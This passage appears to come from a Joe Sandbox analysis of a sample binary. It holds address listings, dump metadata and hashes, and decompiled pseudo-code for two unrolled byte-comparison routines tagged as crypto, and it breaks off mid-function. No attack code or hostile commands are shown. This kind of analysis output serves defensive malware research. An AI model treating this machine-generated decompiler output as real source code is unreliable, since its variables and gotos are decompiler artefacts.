                                                        0x00a21631
                                                        0x00a21633
                                                        0x00a21635
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21643
                                                        0x00a21645
                                                        0x00a2165d
                                                        0x00a21665
                                                        0x00a21667
                                                        0x00a20dc0
                                                        0x00a20dc8
                                                        0x00a20dca
                                                        0x00a20dd7
                                                        0x00a20dd7
                                                        0x00000000
                                                        0x00a20dca
                                                        0x00a21674
                                                        0x00a20dba
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20dba
                                                        0x00a2164e
                                                        0x00a21657
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21657
                                                        0x00a215b7
                                                        0x00a215b9
                                                        0x00a215d1
                                                        0x00a215d9
                                                        0x00a215db
                                                        0x00a215f3
                                                        0x00a215fb
                                                        0x00a215fd
                                                        0x00a21615
                                                        0x00a2161d
                                                        0x00a2161f
                                                        0x00a21628
                                                        0x00a21628
                                                        0x00000000
                                                        0x00a2161f
                                                        0x00a21606
                                                        0x00a2160f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2160f
                                                        0x00a215e4
                                                        0x00a215ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a215ed
                                                        0x00a215c2
                                                        0x00a215cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a215cb
                                                        0x00a21520
                                                        0x00a21522
                                                        0x00a2153a
                                                        0x00a21542
                                                        0x00a21544
                                                        0x00a2155c
                                                        0x00a21564
                                                        0x00a21566
                                                        0x00a2157e
                                                        0x00a21586
                                                        0x00a21588
                                                        0x00a21591
                                                        0x00a21591
                                                        0x00000000
                                                        0x00a21588
                                                        0x00a2156f
                                                        0x00a21578
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21578
                                                        0x00a2154d
                                                        0x00a21556
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21556
                                                        0x00a2152b
                                                        0x00a21534
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21534
                                                        0x00a21489
                                                        0x00a2148b
                                                        0x00a214a3
                                                        0x00a214ab
                                                        0x00a214ad
                                                        0x00a214c5
                                                        0x00a214cd
                                                        0x00a214cf
                                                        0x00a214e7
                                                        0x00a214ef
                                                        0x00a214f1
                                                        0x00a214fa
                                                        0x00a214fa
                                                        0x00000000
                                                        0x00a214f1
                                                        0x00a214d8
                                                        0x00a214e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a214e1
                                                        0x00a214b6
                                                        0x00a214bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a214bf
                                                        0x00a21494
                                                        0x00a2149d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2149d
                                                        0x00a213f1
                                                        0x00a213f3
                                                        0x00a2140b
                                                        0x00a21413
                                                        0x00a21415
                                                        0x00a2142d
                                                        0x00a21435
                                                        0x00a21437
                                                        0x00a2144f
                                                        0x00a21457
                                                        0x00a21459
                                                        0x00a21462
                                                        0x00a21462
                                                        0x00000000
                                                        0x00a21459
                                                        0x00a21440
                                                        0x00a21449
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21449
                                                        0x00a2141e
                                                        0x00a21427
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21427
                                                        0x00a213fc
                                                        0x00a21405
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21405
                                                        0x00a2135a
                                                        0x00a2135c
                                                        0x00a21374
                                                        0x00a2137c
                                                        0x00a2137e
                                                        0x00a21396
                                                        0x00a2139e
                                                        0x00a213a0
                                                        0x00a213b8
                                                        0x00a213c0
                                                        0x00a213c2
                                                        0x00a213cb
                                                        0x00a213cb
                                                        0x00000000
                                                        0x00a213c2
                                                        0x00a213a9
                                                        0x00a213b2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a213b2
                                                        0x00a21387
                                                        0x00a21390
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21390
                                                        0x00a21365
                                                        0x00a2136e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2136e
                                                        0x00a212c3
                                                        0x00a212c5
                                                        0x00a212dd
                                                        0x00a212e5
                                                        0x00a212e7
                                                        0x00a212ff
                                                        0x00a21307
                                                        0x00a21309
                                                        0x00a21321
                                                        0x00a21329
                                                        0x00a2132b
                                                        0x00a21334
                                                        0x00a21334
                                                        0x00000000
                                                        0x00a2132b
                                                        0x00a21312
                                                        0x00a2131b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2131b
                                                        0x00a212f0
                                                        0x00a212f9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a212f9
                                                        0x00a212ce
                                                        0x00a212d7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21224
                                                        0x00a21228
                                                        0x00a2122c
                                                        0x00a2122e
                                                        0x00a21246
                                                        0x00a21246
                                                        0x00a2124e
                                                        0x00a21250
                                                        0x00a21268
                                                        0x00a21268
                                                        0x00a21270
                                                        0x00a21272
                                                        0x00a2128a
                                                        0x00a2128a
                                                        0x00a21292
                                                        0x00a21294
                                                        0x00a2129d
                                                        0x00a2129d
                                                        0x00000000
                                                        0x00a21294
                                                        0x00a21278
                                                        0x00a2127b
                                                        0x00a21284
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21284
                                                        0x00a21256
                                                        0x00a21259
                                                        0x00a21262
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21262
                                                        0x00a21234
                                                        0x00a21237
                                                        0x00a21240
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a21240
                                                        0x00a209a6
                                                        0x00a209a6
                                                        0x00a21797

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: b6cb2f853bb666d042cc77d21dcf3080637d6c2b13bd3379f4804e1198324455
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: DBC150322051A30BEB6D473EA57443FBAA15AE27B131A077DD4F7CB5C6FE10C5649620
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A209AE Relevance: .3, Instructions: 331COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A209AE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                                        0x00a209ae
                                                        0x00a209ae
                                                        0x00a209b4
                                                        0x00a20a2b
                                                        0x00a20a2d
                                                        0x00a20a2f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20a35
                                                        0x00a20a3b
                                                        0x00a20ac2
                                                        0x00a20ac4
                                                        0x00a20ac6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20acc
                                                        0x00a20ad2
                                                        0x00a20b59
                                                        0x00a20b5b
                                                        0x00a20b5d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20b63
                                                        0x00a20b69
                                                        0x00a20bf0
                                                        0x00a20bf2
                                                        0x00a20bf4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20bfa
                                                        0x00a20c00
                                                        0x00a20c87
                                                        0x00a20c89
                                                        0x00a20c8b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20c97
                                                        0x00a20d1f
                                                        0x00a20d21
                                                        0x00a20d23
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20d29
                                                        0x00a20d2f
                                                        0x00a20db6
                                                        0x00a20db8
                                                        0x00a20dba
                                                        0x00a20dc8
                                                        0x00a20dca
                                                        0x00a20dd7
                                                        0x00a20dd7
                                                        0x00a20dca
                                                        0x00000000
                                                        0x00a20dba
                                                        0x00a20d3c
                                                        0x00a20d3e
                                                        0x00a20d56
                                                        0x00a20d5e
                                                        0x00a20d60
                                                        0x00a20d78
                                                        0x00a20d80
                                                        0x00a20d82
                                                        0x00a20d9a
                                                        0x00a20da2
                                                        0x00a20da4
                                                        0x00a20dad
                                                        0x00a20dad
                                                        0x00000000
                                                        0x00a20da4
                                                        0x00a20d8b
                                                        0x00a20d94
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20d94
                                                        0x00a20d69
                                                        0x00a20d72
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20d72
                                                        0x00a20d47
                                                        0x00a20d50
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20d50
                                                        0x00a20ca5
                                                        0x00a20ca7
                                                        0x00a20cbf
                                                        0x00a20cc7
                                                        0x00a20cc9
                                                        0x00a20ce1
                                                        0x00a20ce9
                                                        0x00a20ceb
                                                        0x00a20d03
                                                        0x00a20d0b
                                                        0x00a20d0d
                                                        0x00a20d16
                                                        0x00a20d16
                                                        0x00000000
                                                        0x00a20d0d
                                                        0x00a20cf4
                                                        0x00a20cfd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20cfd
                                                        0x00a20cd2
                                                        0x00a20cdb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20cdb
                                                        0x00a20cb0
                                                        0x00a20cb9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20cb9
                                                        0x00a20c0d
                                                        0x00a20c0f
                                                        0x00a20c27
                                                        0x00a20c2f
                                                        0x00a20c31
                                                        0x00a20c49
                                                        0x00a20c51
                                                        0x00a20c53
                                                        0x00a20c6b
                                                        0x00a20c73
                                                        0x00a20c75
                                                        0x00a20c7e
                                                        0x00a20c7e
                                                        0x00000000
                                                        0x00a20c75
                                                        0x00a20c5c
                                                        0x00a20c65
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20c65
                                                        0x00a20c3a
                                                        0x00a20c43
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20c43
                                                        0x00a20c18
                                                        0x00a20c21
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20c21
                                                        0x00a20b76
                                                        0x00a20b78
                                                        0x00a20b90
                                                        0x00a20b98
                                                        0x00a20b9a
                                                        0x00a20bb2
                                                        0x00a20bba
                                                        0x00a20bbc
                                                        0x00a20bd4
                                                        0x00a20bdc
                                                        0x00a20bde
                                                        0x00a20be7
                                                        0x00a20be7
                                                        0x00000000
                                                        0x00a20bde
                                                        0x00a20bc5
                                                        0x00a20bce
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20bce
                                                        0x00a20ba3
                                                        0x00a20bac
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20bac
                                                        0x00a20b81
                                                        0x00a20b8a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20b8a
                                                        0x00a20adf
                                                        0x00a20ae1
                                                        0x00a20af9
                                                        0x00a20b01
                                                        0x00a20b03
                                                        0x00a20b1b
                                                        0x00a20b23
                                                        0x00a20b25
                                                        0x00a20b3d
                                                        0x00a20b45
                                                        0x00a20b47
                                                        0x00a20b50
                                                        0x00a20b50
                                                        0x00000000
                                                        0x00a20b47
                                                        0x00a20b2e
                                                        0x00a20b37
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20b37
                                                        0x00a20b0c
                                                        0x00a20b15
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20b15
                                                        0x00a20aea
                                                        0x00a20af3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20af3
                                                        0x00a20a48
                                                        0x00a20a4a
                                                        0x00a20a62
                                                        0x00a20a6a
                                                        0x00a20a6c
                                                        0x00a20a84
                                                        0x00a20a8c
                                                        0x00a20a8e
                                                        0x00a20aa6
                                                        0x00a20aae
                                                        0x00a20ab0
                                                        0x00a20ab9
                                                        0x00a20ab9
                                                        0x00000000
                                                        0x00a20ab0
                                                        0x00a20a97
                                                        0x00a20aa0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20aa0
                                                        0x00a20a75
                                                        0x00a20a7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20a7e
                                                        0x00a20a53
                                                        0x00a20a5c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a209b6
                                                        0x00a209b6
                                                        0x00a209bd
                                                        0x00a209bf
                                                        0x00a209d3
                                                        0x00a209d3
                                                        0x00a209db
                                                        0x00a209dd
                                                        0x00a209f1
                                                        0x00a209f1
                                                        0x00a209f9
                                                        0x00a209fb
                                                        0x00a20a0f
                                                        0x00a20a0f
                                                        0x00a20a17
                                                        0x00a20a19
                                                        0x00a20a22
                                                        0x00a20a22
                                                        0x00000000
                                                        0x00a20a19
                                                        0x00a20a01
                                                        0x00a20a04
                                                        0x00a20a0d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20a0d
                                                        0x00a209e3
                                                        0x00a209e6
                                                        0x00a209ef
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a209ef
                                                        0x00a209c5
                                                        0x00a209c8
                                                        0x00a209d1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a209d1
                                                        0x00a209a6
                                                        0x00a209a6
                                                        0x00a21797

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction ID: c58ae08a5b3e2e6cb3978e19422a4a1317a1624572fb32b2b255a5b3f70261cc
                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                        • Instruction Fuzzy Hash: BDC15C322151B30AEB2D473EA57483FBAA15AE27B131A077DD4F7CB1C6FE20D5649620
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A20596 Relevance: .3, Instructions: 323COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A20596(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
